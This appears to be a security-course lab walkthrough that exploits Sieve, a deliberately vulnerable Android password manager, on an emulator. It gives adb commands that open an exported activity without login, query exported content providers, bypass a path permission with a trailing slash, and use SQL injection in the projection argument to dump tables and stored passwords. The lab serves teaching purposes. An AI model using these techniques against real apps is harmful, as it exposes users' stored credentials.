On your host system, in a Web browser, go to
https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk
The app downloads.
Troubleshooting
If that download link fails, use this alternate command:
wget https://samsclass.info/128/proj/sieve.apk
Drag the sieve.apk file and drop it on your running Android emulator.
Troubleshooting
On Genymotion, the app install will fail, because Sieve is an ARM app, but Genymotion is an x86 emulator.To fix this problem, follow the steps below.
Installing ARM Translation Libraries
Get the appropriate library here:https://github.com/m9rco/Genymotion_ARM_Translation
You can download the ZIP file from that page and unzip it, or use "git", as shown below.
On a Mac, execute these commands:
Open the "Genymotion_ARM_Translation/package" folder, as shown below.
brew install git git clone https://github.com/m9rco/Genymotion_ARM_Translation.gitDrag the appropriate library file onto your Android device and drop it there.
A warning message pops up, as shown below. Click OK.
A message says the file was flashed successfully, as shown below. Click OK.
Turn off your Android device and restart it.
./adb devices
You should see your emulator listed,
as shown below.
Launch Sieve, as shown below.
A "Welcome!" screen appears, as shown below.
Enter a password of Password12345678 in both fields and click Submit.
On the "Enter PIN" page, enter a PIN of 4567 in both fields and click Submit, as shown below.
In the next page, enter a password of Password12345678 fields and click "Sign in", as shown below.
In the "Your Passwords" page, at the top right, click the + icon.
Enter some test data, as shown below, and click Save.
Don't put any real passwords into this app, of course, because they will be revealed later in the project.
If you don't have it installed, get it from
https://developer.android.com/studio/
Drag the seive.apk file and drop it on the center pane of Android Studio.In the top section, click AndroidManifest.xml. Its contents appear in the lower pane, as shown below.
M 511.1: Pemission (5 pts)
In the AndroidManifest.xml file, find the permission shown below.The flag is covered by a green rectangle in the image below.
They are named FileSelectActivity and MainLoginActivity, and they are both exported, as shown below.
The first activity is explicity exported with an "exported = true" line, and the second activity includes an intent-filter which makes it exported too.
Scroll down to see the third exported activity, named PWList.
This shows the running apps. Drag Sieve up and throw it away. This closes Sieve.
In your Terminal or Command Prompt, execute this command:
adb shell am start -n com.mwr.example.sieve/.PWList
The password list page opens on your
emulator,
without asking for a password first,
as shown below.
This is an information disclosure exploit, exposing confidential information to a user who has not logged in.
There are two: DBContentProvider and FileBackupProvider, and they are both exported.
https://sourceforge.net/projects/jadx.mirror/
It downloads as a ZIP file.To unzip it:
To launch the program:
In JADX, click File, Open. Open the sieve.apk file.
Click the Search icon, outlined in green in the image below.
Search for content:// as shown below.
Three URIs are found.
adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords
The response contains a username and email address,
but the password is an encrypted BLOB,
as shown below.
adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Keys
You see an error message, saying you don't have
permission to see them,
as shown below.
As shown below, the permissions are defined with this line:
android:path="/Keys"
In a Web browser, go to
https://developer.android.com/guide/topics/manifest/path-permission-element
The "path" permissions are explained, as shown below.These permissions only apply if the exact path ends in /Keys .
M 511.2: Viewing Keys/ (10 pts)
In your Terminal or Command Prompt, execute this command:You see the password, as shown below.
adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Keys/The flag is covered by a green rectangle in the image below.
In your Terminal or Command Prompt, execute this command:
adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
If you see a "no closing quote" error, add a backslash before the apostrophe
near the end of the command, as shown below.
The reply shows"SQLiteException: unrecognized token",
highlighted in the image below.
This error indicates a SQL injection vulnerability.
adb shell
content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
There are three tables, including Passwords and
Key,
as shown below.
M 511.3: Viewing Passwords (5 pts)
In your Terminal or Command Prompt, execute this command:You see the password, as shown below.
content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Passwords;--"The flag is covered by a green rectangle in the image below.